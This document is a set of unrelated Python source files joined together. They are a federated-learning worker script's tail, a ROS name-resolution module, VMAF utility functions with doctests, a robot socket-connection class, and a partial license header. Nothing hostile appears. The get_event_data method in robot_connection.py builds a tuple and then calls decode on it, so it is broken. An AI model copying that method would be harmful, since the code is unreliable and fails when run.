stat = send_summary(args, datacls)
if not stat:
print('Sending data summary failed')
sys.exit()
# heatbeat to central server
heartbeat_service = threading.Thread(target=heartbeat, args=(args, False, ))
heartbeat_service.start()
# Hook PyTorch to add extra functionalities to support FL
hook = sy.TorchHook(torch)
# start server to receive model and train/test from central server
server = start_websocker_server_worker(
id = devid,
host = args.host,
port = args.port,
dataset = args.dataset,
datacls = datacls,
hook = hook,
verbose = args.verbose
)
heartbeat_service.join()
|
name_resolution.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from threading import Thread, RLock
try:
from urlparse import urlparse # python 2 compatibility
except ImportError:
from urllib.parse import urlparse
import socket
import rospy
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon.common import utf8
from fkie_node_manager_daemon.common import isstring
from fkie_node_manager_daemon import url as nmdurl
RESOLVE_CACHE = {} # hostname : address
class MasterEntry(object):
def __init__(self, masteruri=None, mastername=None, address=None):
self.masteruri = masteruri
self._masternames = []
if mastername:
self.add_mastername(mastername)
self.mutex = RLock()
# addresses: hostname (at first place if available), IPv4 or IPv6
self._addresses = []
self.add_address(address)
def __repr__(self):
return "MasterEntry<%s, names=%s, addresses=%s>" % (self.masteruri, self._masternames, self._addresses)
def entry(self):
return [self.masteruri] + list(self._addresses)
def has_mastername(self, mastername):
return mastername in self._masternames
def has_address(self, address):
return address in self._addresses
def add_mastername(self, mastername):
if mastername and mastername not in self._masternames:
self._masternames.insert(0, mastername)
def add_address(self, address):
with self.mutex:
if address and not self.has_address(address):
if self.is_legal_ip(address):
# it is an IP, try to get the hostname
self._addresses.append(address)
# resolve the name in a thread
thread = Thread(target=self._get_hostname, args=((address,)))
thread.daemon = True
thread.start()
else:
# it is a hostname: add at the fist place and try to get an IP for this host
self._addresses.insert(0, address)
# resolve the name in a thread
thread = Thread(target=self._get_address, args=((address,)))
thread.daemon = True
thread.start()
@classmethod
def is_legal_ip(cls, addr):
result = False
try:
socket.inet_pton(socket.AF_INET, addr)
# ok, it is a legal IPv4 address
result = True
except socket.error:
# try for IPv6
try:
socket.inet_pton(socket.AF_INET6, addr)
# ok, it is a legal IPv6 address
result = True
except socket.error:
# not legal IP address
pass
return result
def _get_address(self, hostname):
try:
(_, _, ipaddrlist) = socket.gethostbyaddr(hostname)
with self.mutex:
if ipaddrlist:
RESOLVE_CACHE[hostname] = ipaddrlist
for addr in ipaddrlist:
if not self.has_address(addr):
self._addresses.append(addr)
except Exception:
# no suitable address found
pass
def _get_hostname(self, address):
try:
(hostname, _, _) = socket.gethostbyaddr(address)
with self.mutex:
name_splitted = hostname.split('.')
RESOLVE_CACHE[address] = [name_splitted[0], hostname]
if not self.has_address(hostname):
self._addresses.insert(0, hostname)
if not self.has_address(name_splitted[0]):
self._addresses.insert(0, name_splitted[0])
except Exception:
# no suitable address found
pass
def get_mastername(self):
try:
return self._masternames[0]
except Exception:
return None
def get_masternames(self):
return list(self._masternames)
def get_address(self, prefer_hostname=True):
with self.mutex:
try:
if prefer_hostname:
return self._addresses[0]
return self._addresses[-1]
except Exception:
return None
def addresses(self):
return list(self._addresses)
def remove_mastername(self, mastername):
try:
self._masternames.remove(mastername)
except Exception:
pass
def remove_address(self, address):
try:
self._addresses.remove(address)
except Exception:
pass
def __eq__(self, item):
if isinstance(item, MasterEntry):
result = []
if nmdurl.equal_uri(self.masteruri, item.masteruri):
result = set(self.addresses()).intersection(set(item.addresses()))
return len(result) > 0
return False
class NameResolution(object):
'''
This class stores the association between master URI, master name and
host name or IP. Both the setter and the getter methods are thread safe.
'''
def __init__(self):
self.mutex = RLock()
self._masters = [] # sets with masters
self._hosts = [] # sets with hosts
self._address = [] # avoid the mixing of ip and name as address
def get_master(self, masteruri, address=None):
me = MasterEntry(masteruri, None, address)
with self.mutex:
for m in self._masters:
if m == me:
return m
return me
def remove_master_entry(self, masteruri):
with self.mutex:
for m in self._masters:
if masteruri and m.masteruri == masteruri:
self._masters.remove(m)
return
def remove_info(self, mastername, address):
with self.mutex:
for m in self._masters:
if m.has_mastername(mastername) and m.has_address(address):
m.remove_mastername(mastername)
m.remove_address(address)
return
def add_master_entry(self, masteruri, mastername, address):
with self.mutex:
mastername = self._validate_mastername(mastername, masteruri)
for m in self._masters:
if m.masteruri and m.masteruri == masteruri:
m.add_mastername(mastername)
m.add_address(address)
return
elif m.masteruri is None and m.has_mastername(mastername):
m.masteruri = masteruri
m.add_mastername(mastername)
m.add_address(address)
return
self._masters.append(MasterEntry(masteruri, mastername, address))
def add_info(self, mastername, address):
with self.mutex:
for m in self._masters:
if m.has_mastername(mastername):
m.add_mastername(mastername)
m.add_address(address)
return
if mastername is not None:
self._masters.append(MasterEntry(None, mastername, address))
def _validate_mastername(self, mastername, masteruri):
'''
Not thread safe
'''
mm = self.masteruri(mastername)
if mm and mm != masteruri:
nr = 2
new_name = '%s_%d' % (mastername, nr)
mm = self.masteruri(new_name)
while mm and mm != masteruri:
nr = nr + 1
new_name = '%s_%d' % (mastername, nr)
mm = self.masteruri(new_name)
rospy.logwarn("master name '%s' is already assigned to '%s', rename to '%s'" % (mastername, mm, new_name))
return new_name
return mastername
def has_master(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri:
return True
return False
def mastername(self, masteruri, address=None):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri:
if address is not None:
if m.has_address(address):
return m.get_mastername()
else:
return m.get_mastername()
return get_hostname(masteruri)
def masternames(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri:
return m.get_masternames()
return list()
def masternamebyaddr(self, address):
with self.mutex:
for m in self._masters:
if m.has_address(address):
return m.get_mastername()
return None
def masteruri(self, mastername):
with self.mutex:
for m in self._masters:
if m.has_mastername(mastername):
return m.masteruri
return None
def masteruribyaddr(self, address):
with self.mutex:
for m in self._masters:
if m.has_address(address) and m.masteruri:
return m.masteruri
return None
def masterurisbyaddr(self, address):
with self.mutex:
result = []
for m in self._masters:
if m.has_address(address) and m.masteruri and m.masteruri not in result:
result.append(m.masteruri)
return result
def address(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri or m.has_mastername(masteruri):
return m.get_address(prefer_hostname=False)
return get_hostname(masteruri)
def addresses(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri or m.has_mastername(masteruri):
return m.addresses()
return []
def hostname(self, address, resolve=False):
with self.mutex:
for m in self._masters:
if m.has_address(address) or m.has_mastername(address):
result = m.get_address()
if result and not MasterEntry.is_legal_ip(result):
return result
else:
break
try:
pass
#self.add_address(address)
# if MasterEntry.is_legal_ip(address):
# (hostname, _, _) = socket.gethostbyaddr(address)
# return hostname
except Exception:
import traceback
print(traceback.format_exc())
return address
@classmethod
def masteruri2name(cls, masteruri):
result = masteruri
try:
url = urlparse(masteruri)
if url.port == 11311:
result = '%s' % url.hostname
else:
result = '%s_%d' % (url.hostname, url.port)
except Exception:
pass
return cls.normalize_name(result)
@classmethod
def normalize_name(cls, name):
result = name.replace('-', '_').replace('.', '_')
return result
@classmethod
def is_legal_ip(cls, address):
return MasterEntry.is_legal_ip(address)
def resolve_cached(self, hostname):
try:
return RESOLVE_CACHE[hostname]
except Exception:
pass
return [hostname]
|
misc.py
|
import subprocess
from fnmatch import fnmatch
import multiprocessing
from time import sleep, time
import itertools
__copyright__ = "Copyright 2016-2020, Netflix, Inc."
__license__ = "BSD+Patent"
import sys
import errno
import os
import re
from vmaf import run_process
from vmaf.tools.scanf import sscanf, IncompleteCaptureError, FormatError
try:
unicode # noqa, remove this once python2 support is dropped
except NameError:
unicode = str
def get_stdout_logger():
import logging
logger = logging.getLogger()
handler = logging.StreamHandler(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
return logger
def close_logger(logger):
for handler in logger.handlers:
handler.close()
logger.removeHandler(handler)
def get_file_name_without_extension(path):
"""
>>> get_file_name_without_extension('yuv/src01_hrc01.yuv')
'src01_hrc01'
>>> get_file_name_without_extension('yuv/src01_hrc01')
'src01_hrc01'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.yuv')
'src01_hrc01'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.sdr.yuv')
'src01_hrc01.sdr'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.sdr.dvi.yuv')
'src01_hrc01.sdr.dvi'
"""
return os.path.splitext(path.split("/")[-1])[0]
def get_file_name_with_extension(path):
"""
>>> get_file_name_with_extension('yuv/src01_hrc01.yuv')
'src01_hrc01.yuv'
>>> get_file_name_with_extension('src01_hrc01.yuv')
'src01_hrc01.yuv'
>>> get_file_name_with_extension('abc/xyz/src01_hrc01.yuv')
'src01_hrc01.yuv'
"""
return path.split("/")[-1]
def get_file_name_extension(path):
'''
>>> get_file_name_extension("file:///mnt/zli/test.txt")
'txt'
>>> get_file_name_extension("test.txt")
'txt'
>>> get_file_name_extension("abc")
'abc'
'''
return path.split('.')[-1]
def get_normalized_path(dir_):
"""
>>> get_normalized_path('abc/xyz/')
'abc/xyz'
>>> get_normalized_path('abc/xyz')
'abc/xyz'
>>> get_normalized_path('abc/xyz.txt')
'abc/xyz.txt'
"""
if dir_[-1] == '/':
return dir_[:-1]
else:
return dir_
def get_dir_without_last_slash(path):
"""
>>> get_dir_without_last_slash('abc/src01_hrc01.yuv')
'abc'
>>> get_dir_without_last_slash('src01_hrc01.yuv')
''
>>> get_dir_without_last_slash('abc/xyz/src01_hrc01.yuv')
'abc/xyz'
>>> get_dir_without_last_slash('abc/xyz/')
'abc/xyz'
"""
return "/".join(path.split("/")[:-1])
def make_parent_dirs_if_nonexist(path):
dst_dir = get_dir_without_last_slash(path)
# create dir if not exist yet
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
def delete_dir_if_exists(dir):
if os.path.isdir(dir):
os.rmdir(dir)
def get_normalized_string_from_dict(d):
""" Normalized string representation with sorted keys.
>>> get_normalized_string_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
'bitrate_kbps_45_max_buffer_sec_5.0'
"""
return '_'.join(map(lambda k: '{k}_{v}'.format(k=k,v=d[k]), sorted(d.keys())))
def get_hashable_value_tuple_from_dict(d):
""" Hashable tuple of values with sorted keys.
>>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
(45, 5.0)
>>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, "resolutions": [(740, 480), (1920, 1080), ]})
(45, 5.0, ((740, 480), (1920, 1080)))
"""
return tuple(map(
lambda k: tuple(d[k]) if isinstance(d[k], list) else d[k],
sorted(d.keys())))
def get_unique_str_from_recursive_dict(d):
""" String representation with sorted keys and values for recursive dict.
>>> get_unique_str_from_recursive_dict({'a':1, 'b':2, 'c':{'x':'0', 'y':'1'}})
'{"a": 1, "b": 2, "c": {"x": "0", "y": "1"}}'
>>> get_unique_str_from_recursive_dict({'a':1, 'c':2, 'b':{'y':'1', 'x':'0', }})
'{"a": 1, "b": {"x": "0", "y": "1"}, "c": 2}'
"""
from collections import OrderedDict
import json
def to_ordered_dict_recursively(d):
if isinstance(d, dict):
return OrderedDict(map(
lambda t: (to_ordered_dict_recursively(t[0]), to_ordered_dict_recursively(t[1])),
sorted(d.items())
))
else:
return d
return json.dumps(to_ordered_dict_recursively(d))
def indices(a, func):
"""
Get indices of elements in an array which satisfies func
>>> indices([1, 2, 3, 4], lambda x: x>2)
[2, 3]
>>> indices([1, 2, 3, 4], lambda x: x==2.5)
[]
>>> indices([1, 2, 3, 4], lambda x: x>1 and x<=3)
[1, 2]
>>> indices([1, 2, 3, 4], lambda x: x in [2, 4])
[1, 3]
>>> indices([1,2,3,1,2,3,1,2,3], lambda x: x > 2)
[2, 5, 8]
"""
return [i for (i, val) in enumerate(a) if func(val)]
def import_python_file(filepath):
"""
Import a python file as a module.
:param filepath:
:return:
"""
filename = get_file_name_without_extension(filepath)
try:
from importlib.machinery import SourceFileLoader
ret = SourceFileLoader(filename, filepath).load_module()
except ImportError:
import imp
ret = imp.load_source(filename, filepath)
return ret
def make_absolute_path(path, current_dir):
'''
>>> make_absolute_path('abc/cde.fg', '/xyz/')
'/xyz/abc/cde.fg'
>>> make_absolute_path('/abc/cde.fg', '/xyz/')
'/abc/cde.fg'
'''
if path[0] == '/':
return path
else:
return current_dir + path
def empty_object():
return type('', (), {})()
def get_cmd_option(argv, begin, end, option):
'''
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 3, 5, '--xyz')
'123'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, '--xyz')
'123'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 4, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 5, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 6, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'a')
'b'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'b')
'c'
'''
itr = None
for itr in range(begin, end):
if argv[itr] == option:
break
if itr is not None and itr != end and (itr + 1) != end:
return argv[itr + 1]
return None
def cmd_option_exists(argv, begin, end, option):
'''
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'c')
True
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'c')
False
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'd')
True
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'a')
False
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'b')
False
'''
found = False
for itr in range(begin, end):
if argv[itr] == option:
found = True
break
return found
def index_and_value_of_min(l):
'''
>>> index_and_value_of_min([2, 0, 3])
(1, 0)
'''
return min(enumerate(l), key=lambda x: x[1])
def parallel_map(func, list_args, processes=None):
"""
Build my own parallelized map function since multiprocessing's Process(),
or Pool.map() cannot meet my both needs:
1) be able to control the maximum number of processes in parallel
2) be able to take in non-picklable objects as arguments
"""
# get maximum number of active processes that can be used
max_active_procs = processes if processes is not None else multiprocessing.cpu_count()
# create shared dictionary
return_dict = multiprocessing.Manager().dict()
# define runner function
def func_wrapper(idx_args):
idx, args = idx_args
executor = func(args)
return_dict[idx] = executor
# add idx to args
list_idx_args = []
for idx, args in enumerate(list_args):
list_idx_args.append((idx, args))
procs = []
for idx_args in list_idx_args:
proc = multiprocessing.Process(target=func_wrapper, args=(idx_args,))
procs.append(proc)
waiting_procs = set(procs)
active_procs = set([])
# processing
while True:
# check if any procs in active_procs is done; if yes, remove them
for p in active_procs.copy():
if not p.is_alive():
active_procs.remove(p)
# check if can add a proc to active_procs (add gradually one per loop)
if len(active_procs) < max_active_procs and len(waiting_procs) > 0:
# move one proc from waiting_procs to active_procs
p = waiting_procs.pop()
active_procs.add(p)
p.start()
# if both waiting_procs and active_procs are empty, can terminate
if len(waiting_procs) == 0 and len(active_procs) == 0:
break
sleep(0.01) # check every x sec
# finally, collect results
rets = list(map(lambda idx: return_dict[idx], range(len(list_args))))
return rets
def check_program_exist(program):
'''
>>> check_program_exist("xxxafasd34df")
False
>>> check_program_exist("xxxafasd34df f899")
False
>>> check_program_exist("ls")
True
>>> check_program_exist("ls -all")
True
>>> check_program_exist("pwd")
True
'''
try:
subprocess.call(program.split(), stdout=open(os.devnull, 'wb'))
return True
except OSError as e:
if e.errno == errno.ENOENT:
return False
else:
# Something else went wrong while trying to run `wget`
raise
def check_scanf_match(string, template):
'''
>>> check_scanf_match('frame00000000.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame00000003.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame0000001.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame00000001.icpff', 'frame%08d.icpf')
True
>>> check_scanf_match('gframe00000001.icpff', 'frame%08d.icpf')
False
>>> check_scanf_match('fyrame00000001.icpff', 'frame%08d.icpf')
False
>>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy/frame%08d.icpf')
True
>>> check_scanf_match('xx/yy//frame00000000.icpf', 'xx/yy/frame%08d.icpf')
False
>>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy//frame%08d.icpf')
False
>>> check_scanf_match("-1-2+3-4", "%02d%02d%02d%02d")
True
>>> check_scanf_match('frame00000240.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_30.yuv.avi', '/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_*.yuv.avi')
True
'''
ret = False
try:
sscanf(string, template)
return True
except (FormatError, IncompleteCaptureError):
pass
if fnmatch(string, template):
return True
return False
def match_any_files(template):
dir_ = os.path.dirname(template)
for filename in os.listdir(dir_):
filepath = dir_ + '/' + filename
if check_scanf_match(filepath, template):
return True
return False
def unroll_dict_of_lists(dict_of_lists):
""" Unfold a dictionary of lists into a list of dictionaries.
>>> dict_of_lists = {'norm_type':['normalize'], 'n_estimators':[10, 50], 'random_state': [0]}
>>> expected = [{'n_estimators': 10, 'norm_type': 'normalize', 'random_state': 0}, {'n_estimators': 50, 'norm_type': 'normalize', 'random_state': 0}]
>>> unroll_dict_of_lists(dict_of_lists) == expected
True
"""
keys = sorted(dict_of_lists.keys()) # normalize order
list_of_key_value_pairs = []
for key in keys:
values = dict_of_lists[key]
key_value_pairs = []
for value in values:
key_value_pairs.append((key, value))
list_of_key_value_pairs.append(key_value_pairs)
list_of_key_value_pairs_rearranged = \
itertools.product(*list_of_key_value_pairs)
list_of_dicts = []
for key_value_pairs in list_of_key_value_pairs_rearranged:
list_of_dicts.append(dict(key_value_pairs))
return list_of_dicts
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.
"""
import unicodedata
value = unicodedata.normalize('NFKD', unicode(value)).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '', value).strip().lower())
value = unicode(re.sub('[-\s]+', '-', value))
return value
def neg_if_even(x):
"""
>>> neg_if_even(2)
-1
>>> neg_if_even(1)
1
>>> neg_if_even(0)
-1
>>> neg_if_even(-1)
1
>>> neg_if_even(-2)
-1
"""
return 1 - (x % 2 == 0) * 2
def get_unique_sorted_list(l):
"""
>>> get_unique_sorted_list([3, 4, 4, 1])
[1, 3, 4]
>>> get_unique_sorted_list([])
[]
"""
return sorted(list(set(l)))
class Timer(object):
def __enter__(self):
self.tstart = time()
def __exit__(self, type, value, traceback):
print('Elapsed: %s sec' % (time() - self.tstart))
def dedup_value_in_dict(d):
"""
>>> dedup_value_in_dict({'a': 1, 'b': 1, 'c': 2}) == {'a': 1, 'c': 2}
True
"""
reversed_d = dict()
keys = sorted(d.keys())
for key in keys:
value = d[key]
if value not in reversed_d:
reversed_d[value] = key
d_ = dict()
for value, key in reversed_d.items():
d_[key] = value
return d_
if __name__ == '__main__':
import doctest
doctest.testmod()
|
robot_connection.py
|
#! python3
import socket
import threading
import select
import queue
from . import logger
from .decorators import retry
class RobotConnection(object):
"""
Create a RobotConnection object with a given robot ip.
"""
VIDEO_PORT = 40921
AUDIO_PORT = 40922
CTRL_PORT = 40923
PUSH_PORT = 40924
EVENT_PORT = 40925
IP_PORT = 40926
def __init__(self, robot_ip=''):
self.robot_ip = robot_ip
self.log = logger.Logger(self)
self.video_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.audio_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ctrl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.push_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.event_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ip_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.push_socket.bind(('', RobotConnection.PUSH_PORT))
self.ip_socket.bind(('', RobotConnection.IP_PORT))
self.recv_socket_list = [self.push_socket, self.event_socket]
self.socket_msg_queue = {
self.video_socket: queue.Queue(32),
self.audio_socket: queue.Queue(32),
self.push_socket: queue.Queue(16),
self.event_socket: queue.Queue(16)
}
self.socket_recv_thread = threading.Thread(target=self.__socket_recv_task)
self.is_shutdown = True
def update_robot_ip(self, robot_ip):
"""
Update the robot ip
"""
self.robot_ip = robot_ip
def get_robot_ip(self, timeout=None):
"""
Get the robot ip from ip broadcat port
If optional arg 'timeout' is None (the default), block if necessary until
get robot ip from broadcast port. If 'timeout' is a non-negative number,
it blocks at most 'timeout' seconds and return None if no data back from
robot broadcast port within the time. Otherwise, return the robot ip
immediately.
"""
self.ip_socket.settimeout(timeout)
msg = None
try:
msg, addr = self.ip_socket.recvfrom(1024)
except Exception as e:
self.log.error('Get robot ip failed, please check the robot networking-mode and connection !')
else:
msg = msg.decode('utf-8')
msg = msg[msg.find('robot ip ') + len('robot ip ') : ]
return msg
@retry(n_retries=5)
def open(self):
"""
Open the connection
It will connect the control port and event port with TCP and start a data
receive thread.
"""
self.ctrl_socket.settimeout(5)
try:
self.ctrl_socket.connect((self.robot_ip, RobotConnection.CTRL_PORT))
self.event_socket.connect((self.robot_ip, RobotConnection.EVENT_PORT))
except Exception as e:
self.log.warn('Connection failed, the reason is %s.'%e)
return False
else:
self.is_shutdown = False
self.socket_recv_thread.start()
self.log.info('Connection successful.')
return True
def close(self):
"""
Close the connection
"""
self.is_shutdown = True
self.socket_recv_thread.join()
def start_video_recv(self):
if self.is_shutdown:
self.log.error("Connection is already shut down.")
if self.video_socket not in self.recv_socket_list:
self.video_socket.settimeout(5)
try:
self.video_socket.connect((self.robot_ip, RobotConnection.VIDEO_PORT))
except Exception as e:
self.log.error('Connection failed, the reason is %s'%e)
return False
self.recv_socket_list.append(self.video_socket)
return True
def stop_video_recv(self):
if self.video_socket in self.recv_socket_list:
self.recv_socket_list.remove(self.video_socket)
return True
def start_audio_recv(self):
if self.is_shutdown:
self.log.error("Connection is already shut down.")
if self.audio_socket not in self.recv_socket_list:
self.audio_socket.settimeout(5)
try:
self.audio_socket.connect((self.robot_ip, RobotConnection.AUDIO_PORT))
except Exception as e:
self.log.error('Connection failed, the reason is %s'%e)
return False
self.recv_socket_list.append(self.audio_socket)
return True
def stop_audio_recv(self):
if self.audio_socket in self.recv_socket_list:
self.recv_socket_list.remove(self.audio_socket)
return True
def get_video_data(self, timeout=None, latest_data=False):
"""
Receive control data
If optional arg 'timeout' is None (the default), block if necessary until
get data from control port. If 'timeout' is a non-negative number,
it blocks at most 'timeout' seconds and reuturn None if no data back from
robot video port within the time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
return self.__recv_data(self.video_socket, timeout, latest_data)
def get_audio_data(self, timeout=None, latest_data=False):
"""
Receive control data
If optional arg 'timeout' is None (the default), block if necessary until
get data from control port. If 'timeout' is a non-negative number,
it blocks at most 'timeout' seconds and reuturn None if no data back from
robot video port within the time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
return self.__recv_data(self.audio_socket, timeout, latest_data)
def get_push_data(self, timeout=None, latest_data=False):
"""
Receive push data
If optional arg 'timeout' is None (the default), block if necessary until
get data from push port. If 'timeout' is a non-negative number,
it blocks at most 'timeout' seconds and reuturn None if no data back from
robot push port within the time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
data = self.__recv_data(self.push_socket, timeout, latest_data)
if data:
return data.decode('utf-8').strip(' ;')
def get_event_data(self, timeout=None, latest_data=False):
"""
Receive event data
If optional arg 'timeout' is None (the default), block if necessary until
get data from event port. If 'timeout' is a non-negative number,
it blocks at most 'timeout' seconds and reuturn None if no data back from
robot event port within the time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
data = (self.event_socket, timeout, latest_data)
if data:
return data.decode('utf-8').strip(' ;')
def send_msg(self, msg):
"""
Send msg to control port.
"""
if self.is_shutdown:
self.log.error("Connection invalid. Try robot_connection.start().")
return False, None
try:
self.ctrl_socket.sendall(msg.encode('utf-8'))
except socket.error as e:
self.log.warn("Error at sending '%s': %s" % (msg, e))
return False, None
try:
recv = self.ctrl_socket.recv(4096)
except socket.error as e:
self.log.error("Error at receving the response of '%s': %s" % (msg, e))
return False, None
return True, recv.decode('utf-8').strip(' ;')
@retry(n_retries=3)
def send_cmd(self, cmd):
"""Send a commend which does not require returns.
向s1发送一个不需要返回值的命令
即若执行成功s1只返回'ok'的命令,如 'connect' 命令
Args:
cmd: (str) 命令
Returns:
(succ: (bool) 是否成功,被修饰器使用)
None
"""
# succ, response = self.send_msg(cmd + ';')
succ, response = self.send_msg(cmd)
if succ:
if response == 'ok':
self.log.info("'%s' recevied 'ok'." % cmd)
return True
elif response == '':
self.log.warn("Got null response of '%s'." % cmd)
else:
self.log.warn("Received an error when executing '%s': %s" % (cmd, response))
return False
@retry(n_retries=3)
def send_query(self, cmd):
"""Send a commend which requires returns.
向s1发送一个询问性的(需要返回值的)命令
即所以以'?'结尾的命令,如 'robot mode ?' 命令
Args:
cmd: (str) 命令
Returns:
(succ: (bool) 是否成功,被修饰器使用)
response: (str) 来自s1的返回值
"""
succ, response = self.send_msg(cmd)
# succ, response = self.send_msg(cmd + ';')
if succ:
if response == '':
self.log.warn("Got null response of '%s'." % cmd)
else:
self.log.info("'%s' received '%s'." % (cmd, response))
return True, response
return False, None
def __recv_data(self, socket_obj, timeout, latest_data):
if self.is_shutdown:
self.log.error("Connection is already shut down.")
msg = None
if latest_data:
while self.socket_msg_queue[socket_obj].qsize() > 1:
self.socket_msg_queue[socket_obj].get()
try:
msg = self.socket_msg_queue[socket_obj].get(timeout=timeout)
except Exception as e:
return None
else:
return msg
def __socket_recv_task(self):
self.log.info("SocketRecv thread started.")
while not self.is_shutdown and threading.main_thread().is_alive():
rlist, _, _ = select.select(self.recv_socket_list, [], [], 2)
for s in rlist:
msg, addr = s.recvfrom(4096)
if self.socket_msg_queue[s].full():
self.socket_msg_queue[s].get()
self.socket_msg_queue[s].put(msg)
for s in self.recv_socket_list:
try:
s.shutdown(socket.SHUT_RDWR)
except Exception as e:
pass
self.log.debuginfo('Shutted down SocketRecv thread successfully.')
|
afddagent.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2013, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
